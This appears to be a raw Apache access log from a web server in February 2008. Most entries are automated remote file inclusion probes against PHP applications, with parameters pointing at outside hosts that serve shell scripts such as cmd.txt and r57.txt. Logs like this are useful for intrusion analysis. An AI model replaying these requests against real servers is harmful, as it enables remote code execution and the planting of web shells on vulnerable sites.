82.160.16.3 - - [21/Feb/2008:06:37:10 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:37:51 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:37:51 -0800] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:37:51 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:38:00 -0800] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:38:00 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:38:04 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:06:39:57 -0800] "GET /logs/index2.php?option=com_simpleboard§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:06:39:57 -0800] "GET /index2.php?option=com_simpleboard§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:06:41:23 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:41:49 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:41:49 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:41:59 -0800] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:41:59 -0800] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:42:00 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:42:00 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:42:00 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:42:00 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:06:44:07 -0800] "GET /sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:44:40 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:44:40 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:06:44:40 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:06:44:41 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:06:44:41 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [21/Feb/2008:06:44:41 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.194.121 - - [21/Feb/2008:06:44:42 -0800] "GET /?mosConfig_absolute_path=http://CMD/r7?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.128.49 - - [21/Feb/2008:06:45:11 -0800] "GET /index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:06:45:25 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:06:45:26 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:06:45:29 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:06:45:29 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:06:45:30 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:06:45:31 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [21/Feb/2008:06:46:01 -0800] "GET //lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:06:46:17 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:46:24 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.169.108 - - [21/Feb/2008:06:48:22 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.169.108 - - [21/Feb/2008:06:48:22 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.169.108 - - [21/Feb/2008:06:48:22 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:48:38 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:06:48:38 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [21/Feb/2008:06:49:06 -0800] "GET /logs/access_080129.log//errors.php?error=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.212.210 - - [21/Feb/2008:06:49:10 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [21/Feb/2008:06:49:12 -0800] "GET /?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [21/Feb/2008:06:49:13 -0800] "GET /logs/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 35544 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [21/Feb/2008:06:50:50 -0800] "GET /logs/access_080126.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [21/Feb/2008:06:51:25 -0800] "GET /logs/access_080123.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.81 - - [21/Feb/2008:06:51:46 -0800] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:52:02 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.60.132.199 - - [21/Feb/2008:06:53:10 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [21/Feb/2008:06:53:10 -0800] "GET //lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [21/Feb/2008:06:53:13 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:06:54:05 -0800] "GET //membership/smfbb/index.php?sourcedir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:06:54:09 -0800] "GET /logs//membership/smfbb/index.php?sourcedir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:54:30 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:55:59 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:06:57:18 -0800] "GET /logs/access_080117.log/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:06:57:18 -0800] "GET /sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:06:57:18 -0800] "GET /logs/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.27.146 - - [21/Feb/2008:06:57:41 -0800] "GET /index2.php?option=com_mosmedia§ion=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.52.27.146 - - [21/Feb/2008:06:57:50 -0800] "GET /logs/index2.php?option=com_mosmedia§ion=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:06:58:51 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:06:58:52 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:06:58:52 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:06:59:37 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [21/Feb/2008:07:01:02 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [21/Feb/2008:07:01:02 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [21/Feb/2008:07:01:03 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [21/Feb/2008:07:01:04 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.81 - - [21/Feb/2008:07:01:52 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:02:03 -0800] "GET /logs/access_080117.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:02:07 -0800] "GET /logs/access_080117.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:07:04:46 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:04:47 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:04:48 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:04:48 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:04:49 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:04:50 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:04:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:07:05:27 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:07:07:29 -0800] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:07:07:49 -0800] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:07:07:55 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:07:07:56 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:07:07:56 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.177.136 - - [21/Feb/2008:07:07:57 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.47.194.121 - - [21/Feb/2008:07:08:09 -0800] "GET /logs/access_080126.log/?mosConfig_absolute_path=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.194.121 - - [21/Feb/2008:07:08:09 -0800] "GET /logs/?mosConfig_absolute_path=http://CMD/r7?? HTTP/1.1" 200 36279 "-" "libwww-perl/5.79" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:07:08:21 -0800] "GET /logs/access_080129.log/appserv/main.php?appserv_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:07:08:21 -0800] "GET /appserv/main.php?appserv_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:07:08:21 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:07:08:38 -0800] "GET /appserv/main.php?appserv_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.157.77 - - [21/Feb/2008:07:09:31 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [21/Feb/2008:07:09:31 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:07:11:16 -0800] "GET /logs/access_080106.log/appserv/main.php?appserv_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.139.67.45 - - [21/Feb/2008:07:11:44 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.139.67.45 - - [21/Feb/2008:07:11:44 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.139.67.45 - - [21/Feb/2008:07:11:45 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.204 - - [21/Feb/2008:07:11:52 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.204 - - [21/Feb/2008:07:11:53 -0800] "GET /?M=A HTTP/1.1" 200 2962 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
189.19.29.139 - - [21/Feb/2008:07:11:54 -0800] "GET //modules/coppermine/themes/coppercop.php/themes=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.194.121 - - [21/Feb/2008:07:11:56 -0800] "GET /logs/access_080123.log/?mosConfig_absolute_path=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [21/Feb/2008:07:13:49 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [21/Feb/2008:07:13:50 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [21/Feb/2008:07:13:50 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [21/Feb/2008:07:13:51 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:07:14:38 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:07:14:40 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:07:14:41 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:07:14:46 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:07:14:54 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:07:15:36 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.delire.ru//modules/4nAlbum/public/doc/dan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:07:16:41 -0800] "GET /?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:07:16:42 -0800] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:07:16:42 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
